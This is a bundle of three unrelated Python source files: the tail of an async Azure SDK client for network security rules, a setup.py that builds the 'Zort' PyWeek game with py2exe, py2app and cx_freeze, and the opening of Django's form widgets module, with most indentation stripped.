:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
network_security_group_name=network_security_group_name,
security_rule_name=security_rule_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'securityRuleName': self._serialize.url("security_rule_name", security_rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules/{securityRuleName}'} # type: ignore
async def get(
self,
resource_group_name: str,
network_security_group_name: str,
security_rule_name: str,
**kwargs: Any
) -> "_models.SecurityRule":
"""Get the specified network security rule.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_security_group_name: The name of the network security group.
:type network_security_group_name: str
:param security_rule_name: The name of the security rule.
:type security_rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SecurityRule, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_11_01.models.SecurityRule
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecurityRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'securityRuleName': self._serialize.url("security_rule_name", security_rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('SecurityRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules/{securityRuleName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
network_security_group_name: str,
security_rule_name: str,
security_rule_parameters: "_models.SecurityRule",
**kwargs: Any
) -> "_models.SecurityRule":
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecurityRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'securityRuleName': self._serialize.url("security_rule_name", security_rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(security_rule_parameters, 'SecurityRule')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('SecurityRule', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('SecurityRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules/{securityRuleName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
network_security_group_name: str,
security_rule_name: str,
security_rule_parameters: "_models.SecurityRule",
**kwargs: Any
) -> AsyncLROPoller["_models.SecurityRule"]:
"""Creates or updates a security rule in the specified network security group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_security_group_name: The name of the network security group.
:type network_security_group_name: str
:param security_rule_name: The name of the security rule.
:type security_rule_name: str
:param security_rule_parameters: Parameters supplied to the create or update network security
rule operation.
:type security_rule_parameters: ~azure.mgmt.network.v2019_11_01.models.SecurityRule
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either SecurityRule or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_11_01.models.SecurityRule]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecurityRule"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
network_security_group_name=network_security_group_name,
security_rule_name=security_rule_name,
security_rule_parameters=security_rule_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('SecurityRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'securityRuleName': self._serialize.url("security_rule_name", security_rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules/{securityRuleName}'} # type: ignore
def list(
self,
resource_group_name: str,
network_security_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.SecurityRuleListResult"]:
"""Gets all security rules in a network security group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_security_group_name: The name of the network security group.
:type network_security_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SecurityRuleListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_11_01.models.SecurityRuleListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecurityRuleListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('SecurityRuleListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules'} # type: ignore
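# A minimal usage sketch, assuming azure-identity and azure-mgmt-network
# are installed; the subscription id and resource names are placeholders.
# The operations group above is reached through NetworkManagementClient
# rather than instantiated directly.
async def _security_rules_usage_sketch():
    from azure.identity.aio import DefaultAzureCredential
    from azure.mgmt.network.aio import NetworkManagementClient
    async with DefaultAzureCredential() as credential:
        async with NetworkManagementClient(
                credential, '<subscription-id>') as client:
            rule = await client.security_rules.get(
                '<resource-group>', '<nsg-name>', '<rule-name>')
            print(rule.name)
            async for r in client.security_rules.list(
                    '<resource-group>', '<nsg-name>'):
                print(r.name)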
|
|
import os
# usage: python setup.py command
#
# sdist - build a source dist
# py2exe - build an exe
# py2app - build an app
# cx_freeze - build a linux binary (not implemented)
#
# the goods are placed in the dist dir for you to .zip up or whatever...
APP_NAME = 'zort'
DESCRIPTION = open('README.txt').read()
CHANGES = open('CHANGES.txt').read()
TODO = open('TODO.txt').read()
METADATA = {
'name':APP_NAME,
'version': '0.0.1',
'license': 'BSD License',
'description': 'Zort the Explorer',
'author': 'bitcraft, wkmanire, AlecksG',
'url': 'https://github.com/bitcraft/pyweek19',
'classifiers': [
'Development Status :: 4 - Beta',
'Intended Audience :: End Users/Desktop',
'Intended Audience :: Information Technology',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.0',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
'Topic :: Software Development :: Libraries :: pygame',
'Topic :: Games/Entertainment :: Real Time Strategy',
],
'py2exe.target':'',
#'py2exe.icon':'icon.ico', #64x64
'py2exe.binary':APP_NAME, #leave off the .exe, it will be added
'py2app.target':APP_NAME,
'py2app.icon':'icon.icns', #128x128
#'cx_freeze.cmd':'~/src/cx_Freeze-3.0.3/FreezePython',
'cx_freeze.cmd':'cxfreeze',
'cx_freeze.target':'%s_linux' % APP_NAME,
'cx_freeze.binary':APP_NAME,
}
files_to_remove = ['tk84.dll',
'_ssl.pyd',
'tcl84.dll',
os.path.join('numpy','core', '_dotblas.pyd'),
os.path.join('numpy', 'linalg', 'lapack_lite.pyd'),
]
directories_to_remove = [os.path.join('numpy', 'distutils'),
'distutils',
'tcl',
]
cmdclass = {}
PACKAGEDATA = {
'cmdclass': cmdclass,
'package_dir': {'zort': 'zort',
},
'packages': ['zort',
],
'scripts': ['scripts/zort'],
}
PACKAGEDATA.update(METADATA)
from distutils.core import setup, Extension
try:
import py2exe
except ImportError:
pass
import sys
import glob
import os
import shutil
try:
cmd = sys.argv[1]
except IndexError:
print('Usage: setup.py install|py2exe|py2app|cx_freeze')
raise SystemExit
# utility for adding subdirectories
def add_files(dest,generator):
for dirpath, dirnames, filenames in generator:
for name in 'CVS', '.svn':
if name in dirnames:
dirnames.remove(name)
for name in filenames:
if '~' in name: continue
suffix = os.path.splitext(name)[1]
if suffix in ('.pyc', '.pyo'): continue
if name[0] == '.': continue
filename = os.path.join(dirpath, name)
dest.append(filename)
# define what is our data
_DATA_DIR = os.path.join('zort', 'data')
data = []
add_files(data,os.walk(_DATA_DIR))
#data_dirs = [os.path.join(f2.replace(_DATA_DIR, 'data'), '*') for f2 in data]
data_dirs = [os.path.join(f2.replace(_DATA_DIR, 'data')) for f2 in data]
PACKAGEDATA['package_data'] = {'zort': data_dirs}
data.extend(glob.glob('*.txt'))
#data.append('MANIFEST.in')
# define what is our source
src = []
add_files(src,os.walk('zort'))
src.extend(glob.glob('*.py'))
# build the sdist target
if cmd not in "py2exe py2app cx_freeze".split():
f = open("MANIFEST.in","w")
for l in data: f.write("include "+l+"\n")
for l in src: f.write("include "+l+"\n")
f.close()
setup(**PACKAGEDATA)
# build the py2exe target
if cmd in ('py2exe',):
import numpy
dist_dir = os.path.join('dist',METADATA['py2exe.target'])
data_dir = dist_dir
src = 'run_game.py'
dest = METADATA['py2exe.binary']+'.py'
shutil.copy(src,dest)
setup(
options={'py2exe':{
'dist_dir':dist_dir,
'dll_excludes':['_dotblas.pyd','_numpy.pyd', 'numpy.linalg.lapack_lite.pyd', 'numpy.core._dotblas.pyd'] + files_to_remove,
'excludes':['matplotlib', 'tcl', 'OpenGL'],
'ignores':['matplotlib', 'tcl', 'OpenGL'],
'bundle_files':1,
}},
# windows=[{
console=[{
'script':dest,
#'icon_resources':[(1,METADATA['py2exe.icon'])],
}],
)
# build the py2app target
if cmd == 'py2app':
dist_dir = os.path.join('dist',METADATA['py2app.target']+'.app')
data_dir = os.path.join(dist_dir,'Contents','Resources')
from setuptools import setup
src = 'run_game.py'
dest = METADATA['py2app.target']+'.py'
shutil.copy(src,dest)
APP = [dest]
DATA_FILES = []
OPTIONS = {'argv_emulation': True,
#'iconfile':METADATA['py2app.icon']
}
setup(
app=APP,
data_files=DATA_FILES,
options={'py2app': OPTIONS},
setup_requires=['py2app'],
)
# make the cx_freeze target
if cmd == 'cx_freeze':
app_dist_dir = METADATA['cx_freeze.target'] + "_" + METADATA['version']
dist_dir = os.path.join('dist', app_dist_dir)
data_dir = dist_dir
modules_exclude = "tk, tcl"
cmd_args = (METADATA['cx_freeze.cmd'], dist_dir, METADATA['cx_freeze.binary'], modules_exclude)
sys_cmd = '%s --install-dir=%s --target-name=%s --exclude-modules=%s run_game.py' % cmd_args
print(sys_cmd)
os.system(sys_cmd)
import shutil
if os.path.exists(os.path.join(data_dir, "tcl")):
shutil.rmtree( os.path.join(data_dir, "tcl") )
if os.path.exists(os.path.join(data_dir, "tk")):
shutil.rmtree( os.path.join(data_dir, "tk") )
# recursively make a bunch of folders
def make_dirs(dname_):
parts = list(os.path.split(dname_))
dname = None
while len(parts):
        if dname is None:
dname = parts.pop(0)
else:
dname = os.path.join(dname,parts.pop(0))
if not os.path.isdir(dname):
os.mkdir(dname)
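# (If Python >= 3.2 could be assumed, make_dirs above would collapse to
# os.makedirs(dname_, exist_ok=True); it is spelled out because the
# classifiers still advertise Python 2.5-2.7.)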
# copy data into the binaries
if cmd in ('py2exe','cx_freeze','py2app'):
dest = data_dir
for fname in data:
dname = os.path.join(dest,os.path.dirname(fname))
make_dirs(dname)
if not os.path.isdir(fname):
#print (fname,dname)
shutil.copy(fname,dname)
# make a tgz files.
if cmd == 'cx_freeze':
sys_cmd = "cd dist; tar -vczf %s.tgz %s/" % (app_dist_dir,app_dist_dir)
os.system(sys_cmd)
# remove files from the zip.
if 0 and cmd in ('py2exe',):  # ('py2exe') was a string, so `in` did a substring match
import shutil
#shutil.rmtree( os.path.join('dist') )
#shutil.rmtree( os.path.join('build') )
os.system("unzip dist/library.zip -d dist\library")
for fn in files_to_remove:
os.remove( os.path.join('dist', 'library', fn) )
for d in directories_to_remove:
if os.path.exists( os.path.join('dist', 'library', d) ):
shutil.rmtree( os.path.join('dist', 'library', d) )
os.remove( os.path.join('dist', 'library.zip') )
os.chdir("dist")
os.chdir("library")
os.system("zip -r -9 ..\library.zip .")
os.chdir("..")
os.chdir("..")
|
|
"""
HTML Widget classes
"""
import copy
import datetime
import warnings
from collections import defaultdict
from itertools import chain
from django.forms.utils import to_current_timezone
from django.templatetags.static import static
from django.utils import datetime_safe, formats
from django.utils.datastructures import OrderedSet
from django.utils.dates import MONTHS
from django.utils.formats import get_format
from django.utils.html import format_html, html_safe
from django.utils.regex_helper import _lazy_re_compile
from django.utils.safestring import mark_safe
from django.utils.topological_sort import (
CyclicDependencyError, stable_topological_sort,
)
from django.utils.translation import gettext_lazy as _
from .renderers import get_default_renderer
__all__ = (
'Media', 'MediaDefiningClass', 'Widget', 'TextInput', 'NumberInput',
'EmailInput', 'URLInput', 'PasswordInput', 'HiddenInput',
'MultipleHiddenInput', 'FileInput', 'ClearableFileInput', 'Textarea',
'DateInput', 'DateTimeInput', 'TimeInput', 'CheckboxInput', 'Select',
'NullBooleanSelect', 'SelectMultiple', 'RadioSelect',
'CheckboxSelectMultiple', 'MultiWidget', 'SplitDateTimeWidget',
'SplitHiddenDateTimeWidget', 'SelectDateWidget',
)
MEDIA_TYPES = ('css', 'js')
class MediaOrderConflictWarning(RuntimeWarning):
pass
@html_safe
class Media:
def __init__(self, media=None, css=None, js=None):
if media is not None:
css = getattr(media, 'css', {})
js = getattr(media, 'js', [])
else:
if css is None:
css = {}
if js is None:
js = []
self._css_lists = [css]
self._js_lists = [js]
def __repr__(self):
return 'Media(css=%r, js=%r)' % (self._css, self._js)
def __str__(self):
return self.render()
@property
def _css(self):
css = defaultdict(list)
for css_list in self._css_lists:
for medium, sublist in css_list.items():
css[medium].append(sublist)
return {medium: self.merge(*lists) for medium, lists in css.items()}
@property
def _js(self):
return self.merge(*self._js_lists)
def render(self):
return mark_safe('\n'.join(chain.from_iterable(getattr(self, 'render_' + name)() for name in MEDIA_TYPES)))
def render_js(self):
return [
format_html(
'<script src="{}"></script>',
self.absolute_path(path)
) for path in self._js
]
def render_css(self):
# To keep rendering order consistent, we can't just iterate over items().
# We need to sort the keys, and iterate over the sorted list.
media = sorted(self._css)
return chain.from_iterable([
format_html(
'<link href="{}" type="text/css" media="{}" rel="stylesheet">',
self.absolute_path(path), medium
) for path in self._css[medium]
] for medium in media)
def absolute_path(self, path):
"""
Given a relative or absolute path to a static asset, return an absolute
path. An absolute path will be returned unchanged while a relative path
will be passed to django.templatetags.static.static().
"""
if path.startswith(('http://', 'https://', '/')):
return path
return static(path)
def __getitem__(self, name):
"""Return a Media object that only contains media of the given type."""
if name in MEDIA_TYPES:
return Media(**{str(name): getattr(self, '_' + name)})
raise KeyError('Unknown media type "%s"' % name)
@staticmethod
def merge(*lists):
"""
Merge lists while trying to keep the relative order of the elements.
Warn if the lists have the same elements in a different relative order.
For static assets it can be important to have them included in the DOM
in a certain order. In JavaScript you may not be able to reference a
global or in CSS you might want to override a style.
"""
dependency_graph = defaultdict(set)
all_items = OrderedSet()
for list_ in filter(None, lists):
head = list_[0]
# The first items depend on nothing but have to be part of the
# dependency graph to be included in the result.
dependency_graph.setdefault(head, set())
for item in list_:
all_items.add(item)
# No self dependencies
if head != item:
dependency_graph[item].add(head)
head = item
try:
return stable_topological_sort(all_items, dependency_graph)
except CyclicDependencyError:
warnings.warn(
'Detected duplicate Media files in an opposite order: {}'.format(
', '.join(repr(list_) for list_ in lists)
), MediaOrderConflictWarning,
)
return list(all_items)
def __add__(self, other):
combined = Media()
combined._css_lists = self._css_lists[:]
combined._js_lists = self._js_lists[:]
for item in other._css_lists:
if item and item not in self._css_lists:
combined._css_lists.append(item)
for item in other._js_lists:
if item and item not in self._js_lists:
combined._js_lists.append(item)
return combined
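# A minimal sketch of how merge() resolves combined lists (asset names
# illustrative):
#   (Media(js=['a.js', 'b.js']) + Media(js=['b.js', 'c.js']))._js
#       -> ['a.js', 'b.js', 'c.js']      # relative order preserved
#   (Media(js=['a.js', 'b.js']) + Media(js=['b.js', 'a.js']))._js
#       -> MediaOrderConflictWarning; falls back to ['a.js', 'b.js'],
#          the first-seen order.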
def media_property(cls):
def _media(self):
# Get the media property of the superclass, if it exists
sup_cls = super(cls, self)
try:
base = sup_cls.media
except AttributeError:
base = Media()
# Get the media definition for this class
definition = getattr(cls, 'Media', None)
if definition:
extend = getattr(definition, 'extend', True)
if extend:
if extend is True:
m = base
else:
m = Media()
for medium in extend:
m = m + base[medium]
return m + Media(definition)
return Media(definition)
return base
return property(_media)
class MediaDefiningClass(type):
"""
Metaclass for classes that can have media definitions.
"""
def __new__(mcs, name, bases, attrs):
new_class = super().__new__(mcs, name, bases, attrs)
if 'media' not in attrs:
new_class.media = media_property(new_class)
return new_class
class Widget(metaclass=MediaDefiningClass):
    needs_multipart_form = False  # Determines whether the widget needs a multipart form.
is_localized = False
is_required = False
supports_microseconds = True
def __init__(self, attrs=None):
self.attrs = {} if attrs is None else attrs.copy()
def __deepcopy__(self, memo):
obj = copy.copy(self)
obj.attrs = self.attrs.copy()
memo[id(self)] = obj
return obj
@property
def is_hidden(self):
return self.input_type == 'hidden' if hasattr(self, 'input_type') else False
def subwidgets(self, name, value, attrs=None):
context = self.get_context(name, value, attrs)
yield context['widget']
def format_value(self, value):
"""
Return a value as it should appear when rendered in a template.
"""
if value == '' or value is None:
return None
if self.is_localized:
return formats.localize_input(value)
return str(value)
def get_context(self, name, value, attrs):
return {
'widget': {
'name': name,
'is_hidden': self.is_hidden,
'required': self.is_required,
'value': self.format_value(value),
'attrs': self.build_attrs(self.attrs, attrs),
'template_name': self.template_name,
},
}
def render(self, name, value, attrs=None, renderer=None):
"""Render the widget as an HTML string."""
context = self.get_context(name, value, attrs)
return self._render(self.template_name, context, renderer)
def _render(self, template_name, context, renderer=None):
if renderer is None:
renderer = get_default_renderer()
return mark_safe(renderer.render(template_name, context))
def build_attrs(self, base_attrs, extra_attrs=None):
"""Build an attribute dictionary."""
return {**base_attrs, **(extra_attrs or {})}
def value_from_datadict(self, data, files, name):
"""
Given a dictionary of data and this widget's name, return the value
of this widget or None if it's not provided.
"""
return data.get(name)
def value_omitted_from_data(self, data, files, name):
return name not in data
def id_for_label(self, id_):
"""
Return the HTML ID attribute of this Widget for use by a <label>,
given the ID of the field. Return None if no ID is available.
This hook is necessary because some widgets have multiple HTML
elements and, thus, multiple IDs. In that case, this method should
return an ID value that corresponds to the first ID in the widget's
tags.
"""
return id_
def use_required_attribute(self, initial):
return not self.is_hidden
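# A minimal sketch, with illustrative asset names: MediaDefiningClass turns
# an inner Media declaration into the lazily merged ``media`` property.
def _media_defining_sketch():
    class CalendarWidget(Widget):
        class Media:
            css = {'all': ('calendar.css',)}
            js = ('calendar.js',)
    return CalendarWidget().media  # Media(css={'all': [...]}, js=[...])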
class Input(Widget):
"""
Base class for all <input> widgets.
"""
input_type = None # Subclasses must define this.
template_name = 'django/forms/widgets/input.html'
def __init__(self, attrs=None):
if attrs is not None:
attrs = attrs.copy()
self.input_type = attrs.pop('type', self.input_type)
super().__init__(attrs)
def get_context(self, name, value, attrs):
context = super().get_context(name, value, attrs)
context['widget']['type'] = self.input_type
return context
class TextInput(Input):
input_type = 'text'
template_name = 'django/forms/widgets/text.html'
class NumberInput(Input):
input_type = 'number'
template_name = 'django/forms/widgets/number.html'
class EmailInput(Input):
input_type = 'email'
template_name = 'django/forms/widgets/email.html'
class URLInput(Input):
input_type = 'url'
template_name = 'django/forms/widgets/url.html'
class PasswordInput(Input):
input_type = 'password'
template_name = 'django/forms/widgets/password.html'
def __init__(self, attrs=None, render_value=False):
super().__init__(attrs)
self.render_value = render_value
def get_context(self, name, value, attrs):
if not self.render_value:
value = None
return super().get_context(name, value, attrs)
class HiddenInput(Input):
input_type = 'hidden'
template_name = 'django/forms/widgets/hidden.html'
class MultipleHiddenInput(HiddenInput):
"""
Handle <input type="hidden"> for fields that have a list
of values.
"""
template_name = 'django/forms/widgets/multiple_hidden.html'
def get_context(self, name, value, attrs):
context = super().get_context(name, value, attrs)
final_attrs = context['widget']['attrs']
id_ = context['widget']['attrs'].get('id')
subwidgets = []
for index, value_ in enumerate(context['widget']['value']):
widget_attrs = final_attrs.copy()
if id_:
# An ID attribute was given. Add a numeric index as a suffix
# so that the inputs don't all have the same ID attribute.
widget_attrs['id'] = '%s_%s' % (id_, index)
widget = HiddenInput()
widget.is_required = self.is_required
subwidgets.append(widget.get_context(name, value_, widget_attrs)['widget'])
context['widget']['subwidgets'] = subwidgets
return context
def value_from_datadict(self, data, files, name):
try:
getter = data.getlist
except AttributeError:
getter = data.get
return getter(name)
def format_value(self, value):
return [] if value is None else value
class FileInput(Input):
input_type = 'file'
needs_multipart_form = True
template_name = 'django/forms/widgets/file.html'
def format_value(self, value):
"""File input never renders a value."""
return
def value_from_datadict(self, data, files, name):
"File widgets take data from FILES, not POST"
return files.get(name)
def value_omitted_from_data(self, data, files, name):
return name not in files
def use_required_attribute(self, initial):
return super().use_required_attribute(initial) and not initial
FILE_INPUT_CONTRADICTION = object()
class ClearableFileInput(FileInput):
clear_checkbox_label = _('Clear')
initial_text = _('Currently')
input_text = _('Change')
template_name = 'django/forms/widgets/clearable_file_input.html'
def clear_checkbox_name(self, name):
"""
Given the name of the file input, return the name of the clear checkbox
input.
"""
return name + '-clear'
def clear_checkbox_id(self, name):
"""
Given the name of the clear checkbox input, return the HTML id for it.
"""
return name + '_id'
def is_initial(self, value):
"""
Return whether value is considered to be initial value.
"""
return bool(value and getattr(value, 'url', False))
def format_value(self, value):
"""
Return the file object if it has a defined url attribute.
"""
if self.is_initial(value):
return value
def get_context(self, name, value, attrs):
context = super().get_context(name, value, attrs)
checkbox_name = self.clear_checkbox_name(name)
checkbox_id = self.clear_checkbox_id(checkbox_name)
context['widget'].update({
'checkbox_name': checkbox_name,
'checkbox_id': checkbox_id,
'is_initial': self.is_initial(value),
'input_text': self.input_text,
'initial_text': self.initial_text,
'clear_checkbox_label': self.clear_checkbox_label,
})
return context
def value_from_datadict(self, data, files, name):
upload = super().value_from_datadict(data, files, name)
if not self.is_required and CheckboxInput().value_from_datadict(
data, files, self.clear_checkbox_name(name)):
if upload:
# If the user contradicts themselves (uploads a new file AND
# checks the "clear" checkbox), we return a unique marker
# object that FileField will turn into a ValidationError.
return FILE_INPUT_CONTRADICTION
# False signals to clear any existing value, as opposed to just None
return False
return upload
def value_omitted_from_data(self, data, files, name):
return (
super().value_omitted_from_data(data, files, name) and
self.clear_checkbox_name(name) not in data
)
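# A minimal sketch of the three outcomes of value_from_datadict above
# (plain dicts stand in for request.POST / request.FILES): None means keep
# the current file, False means clear it, and a simultaneous upload plus
# clear yields FILE_INPUT_CONTRADICTION.
def _clearable_file_input_sketch():
    widget = ClearableFileInput()
    keep = widget.value_from_datadict({}, {}, 'avatar')
    clear = widget.value_from_datadict({'avatar-clear': 'on'}, {}, 'avatar')
    both = widget.value_from_datadict(
        {'avatar-clear': 'on'}, {'avatar': object()}, 'avatar')
    return keep, clear, both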
class Textarea(Widget):
template_name = 'django/forms/widgets/textarea.html'
def __init__(self, attrs=None):
# Use slightly better defaults than HTML's 20x2 box
default_attrs = {'cols': '40', 'rows': '10'}
if attrs:
default_attrs.update(attrs)
super().__init__(default_attrs)
class DateTimeBaseInput(TextInput):
format_key = ''
supports_microseconds = False
def __init__(self, attrs=None, format=None):
super().__init__(attrs)
self.format = format or None
def format_value(self, value):
return formats.localize_input(value, self.format or formats.get_format(self.format_key)[0])
class DateInput(DateTimeBaseInput):
format_key = 'DATE_INPUT_FORMATS'
template_name = 'django/forms/widgets/date.html'
